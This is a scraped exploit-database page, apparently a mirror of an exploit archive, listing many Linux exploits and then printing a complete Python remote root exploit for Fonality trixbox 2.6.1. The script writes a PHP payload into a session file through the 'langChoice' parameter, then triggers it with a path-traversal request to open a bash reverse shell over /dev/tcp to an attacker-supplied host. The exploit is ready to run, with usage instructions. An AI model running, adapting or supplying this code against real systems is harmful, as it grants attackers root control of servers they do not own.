Menu

Improved exploit search engine. Try it out

"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)"

Author

muts

Platform

linux

Release date

2008-07-12

Release Date Title Type Platform Author
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
2019-07-16 "CentOS Control Web Panel 0.9.8.838 - User Enumeration" webapps linux "Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak"
2019-07-16 "CentOS Control Web Panel 0.9.8.836 - Privilege Escalation" webapps linux "Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak"
2019-07-16 "CentOS Control Web Panel 0.9.8.836 - Authentication Bypass" webapps linux "Pongtorn Angsuchotmetee"
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-01 "PowerPanel Business Edition - Cross-Site Scripting" webapps linux "Joey Lane"
2019-07-01 "Linux Mint 18.3-19.1 - 'yelp' Command Injection" remote linux b1ack0wl
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-20 "Linux - Use-After-Free via race Between modify_ldt() and #BR Exception" dos linux "Google Security Research"
2019-06-18 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" local linux "Guy Levin"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-11 "Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)" remote linux AkkuS
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-06-05 "Exim 4.87 < 4.91 - (Local / Remote) Command Execution" remote linux "Qualys Corporation"
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-04 "Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution" local linux Arminius
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
Release Date Title Type Platform Author
2019-04-08 "QNAP Netatalk < 3.1.12 - Authentication Bypass" remote multiple muts
2012-08-08 "IBM Proventia Network Mail Security System 2.5 - POST File Read" webapps windows muts
2012-07-24 "Zabbix 2.0.1 - Session Extractor" webapps php muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution" webapps linux muts
2012-07-23 "Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers" webapps php muts
2012-07-23 "Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection" webapps linux muts
2012-07-22 "ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution" webapps asp muts
2012-07-22 "Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection" webapps php muts
2012-07-21 "SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities" webapps windows muts
2012-07-21 "X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting" webapps php muts
2012-03-23 "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" webapps php muts
2012-05-26 "Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution" webapps linux muts
2012-07-24 "Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution" remote linux muts
2012-07-21 "AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution" remote linux muts
2012-05-01 "SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection" remote windows muts
2009-09-01 "Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow" remote windows muts
2008-12-10 "Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow" remote windows muts
2008-07-12 "Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)" remote linux muts
2008-04-02 "HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)" remote windows muts
2008-03-26 "Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)" remote windows muts
2008-03-26 "TFTP Server 1.4 - ST Buffer Overflow" remote windows muts
2007-12-12 "HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow" remote windows muts
2007-11-26 "Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal" remote windows muts
2007-10-27 "IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow" remote windows muts
2007-06-03 "IBM Tivoli Provisioning Manager - Remote Overflow (Egghunter)" remote windows muts
2007-03-31 "IBM Lotus Domino Server 6.5 - Remote Overflow" remote windows muts
2007-03-21 "Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)" remote windows muts
2006-10-01 "McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)" remote windows muts
2006-08-26 "Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow" remote windows muts
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/6045/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/6045/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/6045/11053/fonality-trixbox-261-langchoice-remote-code-execution-python/download/", "exploit_id": "6045", "exploit_description": "\"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)\"", "exploit_date": "2008-07-12", "exploit_author": "muts", "exploit_type": "remote", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# All credits to Jean-Michel BESNARD <jmbesnard@gmail.com>
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
##################################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
##################################################################################################

import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
	print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
	exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer

def send_post(host,port,input):
	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send(input)
	output=s.recv(1024)
	s.close()
	return output

def find_sessionid(http_output):
	headers=re.split("\n",http_output)
	for header in headers:
	        if re.search("Set-Cookie",header):
           	    	cook=header.split(" ")
			sessionid=cook[1][10:42]
	                print "[*] Session ID is %s" % sessionid
			return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>" 
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

# milw0rm.com [2008-07-12]